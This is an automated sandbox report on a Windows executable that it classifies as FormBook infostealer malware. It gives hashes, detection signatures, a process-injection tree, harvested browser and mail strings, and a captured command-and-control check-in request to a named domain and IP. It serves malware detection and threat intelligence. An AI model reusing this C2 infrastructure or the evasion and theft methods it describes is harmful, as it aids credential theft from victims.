Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2998MOD PO.exe

Overview

General Information

Sample name:2998MOD PO.exe
Analysis ID:1542414
MD5:eba2ade6a60568538d8b918f65fa2f44
SHA1:fbb6cb7c1c403502560bfe74340b06f31775a7eb
SHA256:7b70d479034f458a6b695cc3c8aefd50c771ec183b749276aa66d18a6a33466c
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Creation with Colorcpl
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 2998MOD PO.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\2998MOD PO.exe" MD5: EBA2ADE6A60568538D8B918F65FA2F44)
    • 2998MOD PO.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\2998MOD PO.exe" MD5: EBA2ADE6A60568538D8B918F65FA2F44)
    • 2998MOD PO.exe (PID: 7696 cmdline: "C:\Users\user\Desktop\2998MOD PO.exe" MD5: EBA2ADE6A60568538D8B918F65FA2F44)
      • sePlrCtAXqpc.exe (PID: 2500 cmdline: "C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • colorcpl.exe (PID: 7924 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
          • sePlrCtAXqpc.exe (PID: 3496 cmdline: "C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8048 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2288704216.0000000004A40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.2041194663.00000000018F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.2288668245.00000000049F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.3564602723.0000000004DF0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.2998MOD PO.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.2998MOD PO.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Creation with Colorcpl
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7924, TargetFilename: C:\Users\user

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-25T22:10:39.644215+020028554651A Network Trojan was detected192.168.2.4497413.33.130.19080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: 2998MOD PO.exeReversingLabs: Detection: 68%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.2998MOD PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2998MOD PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2288704216.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2041194663.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2288668245.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3564602723.0000000004DF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3560962985.0000000002F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2042765684.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: 2998MOD PO.exeJoe Sandbox ML: detected
                Source: 2998MOD PO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 2998MOD PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: colorcpl.pdbGCTL source: 2998MOD PO.exe, 00000004.00000002.2040956683.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560731508.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: colorcpl.pdb source: 2998MOD PO.exe, 00000004.00000002.2040956683.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560731508.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sePlrCtAXqpc.exe, 00000007.00000002.3560434817.0000000000DBE000.00000002.00000001.01000000.0000000C.sdmp, sePlrCtAXqpc.exe, 00000009.00000002.3562689546.0000000000DBE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: 2998MOD PO.exe, 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2043927456.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2041561877.0000000004929000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 2998MOD PO.exe, 2998MOD PO.exe, 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000003.2043927456.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2041561877.0000000004929000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: SWBp.pdb source: 2998MOD PO.exe
                Source: Binary string: SWBp.pdbSHA256Y source: 2998MOD PO.exe
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then mov ebx, 00000004h8_2_04B404E0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 3.33.130.190:80
                Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
                Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /up8i/?Ax=9lO0gd2hrt6dKrz&1b80hL3=FonQAt5G6G0h5a/xcW34pfv7cxcrms3RfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQdsR1nmqFV7MzuwwVkSFycHqtReIUzDRqobl4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.ladylawher.orgUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global trafficDNS traffic detected: DNS query: www.ladylawher.org
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: 2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: colorcpl.exe, 00000008.00000002.2287863958.0000000002F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: colorcpl.exe, 00000008.00000002.2287863958.0000000002F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: colorcpl.exe, 00000008.00000002.2287863958.0000000002F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: colorcpl.exe, 00000008.00000002.2287863958.0000000002F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033/
                Source: colorcpl.exe, 00000008.00000002.2287863958.0000000002F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: colorcpl.exe, 00000008.00000002.2287863958.0000000002F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: colorcpl.exe, 00000008.00000003.2221615291.0000000007FD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.2998MOD PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2998MOD PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2288704216.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2041194663.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2288668245.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3564602723.0000000004DF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3560962985.0000000002F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2042765684.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0042C433 NtClose,4_2_0042C433
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0040A9E3 NtResumeThread,4_2_0040A9E3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2B60 NtClose,LdrInitializeThunk,4_2_019C2B60
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_019C2DF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_019C2C70
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C35C0 NtCreateMutant,LdrInitializeThunk,4_2_019C35C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C4340 NtSetContextThread,4_2_019C4340
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C4650 NtSuspendThread,4_2_019C4650
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2B80 NtQueryInformationFile,4_2_019C2B80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2BA0 NtEnumerateValueKey,4_2_019C2BA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2BF0 NtAllocateVirtualMemory,4_2_019C2BF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2BE0 NtQueryValueKey,4_2_019C2BE0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2AB0 NtWaitForSingleObject,4_2_019C2AB0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2AD0 NtReadFile,4_2_019C2AD0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2AF0 NtWriteFile,4_2_019C2AF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2DB0 NtEnumerateKey,4_2_019C2DB0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2DD0 NtDelayExecution,4_2_019C2DD0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2D10 NtMapViewOfSection,4_2_019C2D10
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2D00 NtSetInformationFile,4_2_019C2D00
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2D30 NtUnmapViewOfSection,4_2_019C2D30
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2CA0 NtQueryInformationToken,4_2_019C2CA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2CC0 NtQueryVirtualMemory,4_2_019C2CC0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2CF0 NtOpenProcess,4_2_019C2CF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2C00 NtQueryInformationProcess,4_2_019C2C00
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2C60 NtCreateKey,4_2_019C2C60
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2F90 NtProtectVirtualMemory,4_2_019C2F90
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2FB0 NtResumeThread,4_2_019C2FB0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2FA0 NtQuerySection,4_2_019C2FA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2FE0 NtCreateFile,4_2_019C2FE0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2F30 NtCreateSection,4_2_019C2F30
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2F60 NtCreateProcessEx,4_2_019C2F60
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2E80 NtReadVirtualMemory,4_2_019C2E80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2EA0 NtAdjustPrivilegesToken,4_2_019C2EA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2EE0 NtQueueApcThread,4_2_019C2EE0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2E30 NtWriteVirtualMemory,4_2_019C2E30
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C3090 NtSetValueKey,4_2_019C3090
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C3010 NtOpenDirectoryObject,4_2_019C3010
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C39B0 NtGetContextThread,4_2_019C39B0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C3D10 NtOpenProcessToken,4_2_019C3D10
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C3D70 NtOpenThread,4_2_019C3D70
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF4650 NtSuspendThread,LdrInitializeThunk,8_2_04CF4650
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF4340 NtSetContextThread,LdrInitializeThunk,8_2_04CF4340
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_04CF2CA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2C60 NtCreateKey,LdrInitializeThunk,8_2_04CF2C60
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_04CF2C70
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2DD0 NtDelayExecution,LdrInitializeThunk,8_2_04CF2DD0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_04CF2DF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_04CF2D10
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_04CF2D30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_04CF2EE0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_04CF2E80
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2FE0 NtCreateFile,LdrInitializeThunk,8_2_04CF2FE0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2FB0 NtResumeThread,LdrInitializeThunk,8_2_04CF2FB0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2F30 NtCreateSection,LdrInitializeThunk,8_2_04CF2F30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2AD0 NtReadFile,LdrInitializeThunk,8_2_04CF2AD0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2AF0 NtWriteFile,LdrInitializeThunk,8_2_04CF2AF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_04CF2BE0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04CF2BF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_04CF2BA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2B60 NtClose,LdrInitializeThunk,8_2_04CF2B60
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF35C0 NtCreateMutant,LdrInitializeThunk,8_2_04CF35C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF39B0 NtGetContextThread,LdrInitializeThunk,8_2_04CF39B0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2CC0 NtQueryVirtualMemory,8_2_04CF2CC0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2CF0 NtOpenProcess,8_2_04CF2CF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2C00 NtQueryInformationProcess,8_2_04CF2C00
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2DB0 NtEnumerateKey,8_2_04CF2DB0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2D00 NtSetInformationFile,8_2_04CF2D00
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2EA0 NtAdjustPrivilegesToken,8_2_04CF2EA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2E30 NtWriteVirtualMemory,8_2_04CF2E30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2F90 NtProtectVirtualMemory,8_2_04CF2F90
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2FA0 NtQuerySection,8_2_04CF2FA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2F60 NtCreateProcessEx,8_2_04CF2F60
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2AB0 NtWaitForSingleObject,8_2_04CF2AB0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF2B80 NtQueryInformationFile,8_2_04CF2B80
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF3090 NtSetValueKey,8_2_04CF3090
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF3010 NtOpenDirectoryObject,8_2_04CF3010
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF3D70 NtOpenThread,8_2_04CF3D70
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF3D10 NtOpenProcessToken,8_2_04CF3D10
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04B4EF7E NtQueryInformationProcess,NtReadVirtualMemory,8_2_04B4EF7E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 0_2_0117D5FC0_2_0117D5FC
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 0_2_05640F280_2_05640F28
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 0_2_056437E10_2_056437E1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 0_2_056437F00_2_056437F0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 0_2_056417880_2_05641788
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 0_2_056417980_2_05641798
